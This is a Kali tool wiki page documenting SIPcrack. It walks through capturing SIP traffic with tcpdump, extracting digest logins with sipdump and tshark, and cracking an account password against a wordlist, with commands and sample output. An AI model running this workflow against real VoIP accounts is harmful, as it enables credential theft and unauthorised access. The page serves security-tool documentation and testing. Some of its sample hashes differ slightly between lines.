weyne/kaliwiki
1
0
Fork 0
mirror of https://github.com/mubix/kaliwiki.git synced 2025-10-29 16:59:26 +00:00
Code Issues Packages Projects Releases Wiki Activity
kaliwiki/tools/sipcrack.md
Will Pennell 128e9f3284 Create sipcrack.md
2014-09-25 12:53:31 -04:00

135 lines
4.3 KiB
Markdown
Raw Blame History

# sipcrack
Notes
-------
SIPcrack is a suite for sniffing and cracking the digest authentication used in the SIP protocol.
The tools offer support for pcap files, wordlists and many more to extract all needed information and bruteforce the passwords for the sniffed accounts.
SIPcrack contains 2 programs: sipdump to capture the digest authentication and sipcrack to bruteforce the hash using a wordlist or standard input. sipdump dumps SIP digest authentications. If a login is found, the sniffed login is written to the dump file. See 'sipdump -h' for options.
sipcrack bruteforces the user's password with the dump file generated by sipdump. If a password is found, the sniffed and cracked login will be updated in the dump file. See 'sipcrack -h' for options.
Help Text
-------
```
SIPcrack 0.2 ( MaJoMu | www.codito.de )
----------------------------------------
Usage: sipcrack [OPTIONS] [ -s | -w <wordlist> ] <dump file>
<dump file> = file containing logins sniffed by SIPdump
Options:
-s = use stdin for passwords
-w wordlist = file containing all passwords to try
-p num = print cracking process every n passwords (for -w)
(ATTENTION: slows down heavily)
* Either -w <wordlist> or -s has to be given
```
Example Usage
-------
Use sipdump to dump SIP digest authentications to a file. If a login is found, the sniffed login is written to the dump file.
Use sipcrack to bruteforce the user password using the dump file generated by sipdump. If a password is found, the sniffed login in the dump file is updated.
Example from [aldeid](http://www.aldeid.com/wiki/Crack-VoIP)
*Capturing the traffic*
Let's capture the traffic using tcpdump:
```
$ tcpdump -s0 -w sip.pcap tcp or udp
```
*Isolating the login*
sipdump is a tool shipped with SIPcrack. It enables to detect the SIP login from a related traffic capture file.
```
$ cd ~/src/SIPcrack-0.3pre/
$ ./sipdump -p ~/tmp/sip.pcap logins.dump
SIPdump 0.3pre ( MaJoMu | www.codito.de )
---------------------------------------
* Using pcap file '../../tmp/sip.pcap' for sniffing
* Starting to sniff with packet filter 'tcp or udp'
* Dumped login from 212.27.52.5 -> 192.168.1.29 (User: '0950236158')
* Exiting, sniffed 1 logins
$ cat logins.dump
192.168.1.29"212.27.52.5"0950236158"freephonie.net"BYE"sip:172.17.20.241:5062
"04cd38e646e760da129f99fa734ac1e4""""MD5"dc59445f8ef78a615a2ad4d57835a383
```
As you can see from the string above, the login appears in clear, and the password as a MD5 hash.
Notice that we could also have used tshark to obtain the same result:
```
$ tshark -r sip.pcap -Tfields -e sip.auth | grep username
Proxy-Authorization: Digest username=\"0950236158\",realm=\"freephonie.net\",
nonce=\"04cd38e646e760da129f99fa734ac1e4\",uri=\"sip:0950236158@freephonie.net\",
response=\"dc59445f8ef78a615a2ad4d57835a383\",algorithm=MD5,
opaque=\"04cc3f555880bdf\"\x0d\x0a
Proxy-Authorization: Digest username=\"0950236158\",realm=\"freephonie.net\",
nonce=\"04cd38e646e760da129f99fa734ac1e4\",uri=\"sip:172.17.20.241:5062\",
response=\"dc59995a8eb78f605a2ad5d57835a383\",algorithm=MD5,
opaque=\"04cd38e646e760\"\x0d\x0a
```
*Cracking the password*
sipcrack is based on dictionaries to crack the password. For the example, we have built a file containing our password.
```
$ car ~/exploits/dictionaries/test.txt
azerty
elephant
test
password
admin
password01
Password01
507ZEy@l
oops
oopsoops
cat
dog7
monster
$ ./sipcrack -w ~/exploits/dictionaries/test.txt logins.dump
SIPcrack 0.3pre ( MaJoMu | www.codito.de )
----------------------------------------
* Found Accounts:
Num Server Client User Hash|Password
1 192.168.1.29 212.27.52.5 0950236158 dc59495f8eb78a605a2ad5d57835a383
* Select which entry to crack (1 - 1): 1
* Generating static MD5 hash... 04cd38e646e760da129f99fa734ac1e4
* Starting bruteforce against user '0950236158' (MD5: 'dc59445f8ef78a615a2ad4d57835a383')
* Loaded wordlist: '~/exploits/dictionaries/test.txt'
* Starting bruteforce against user '0950236158' (MD5: 'dc59445f8ef78a615a2ad4d57835a383')
* Tried 10 passwords in 0 seconds
* Found password: '507ZEy@l'
* Updating dump file 'logins.dump'... done
```
Links
-------
* [cracking VOIP](http://www.aldeid.com/wiki/Crack-VoIP)
Reference in New Issue View Git Blame Copy Permalink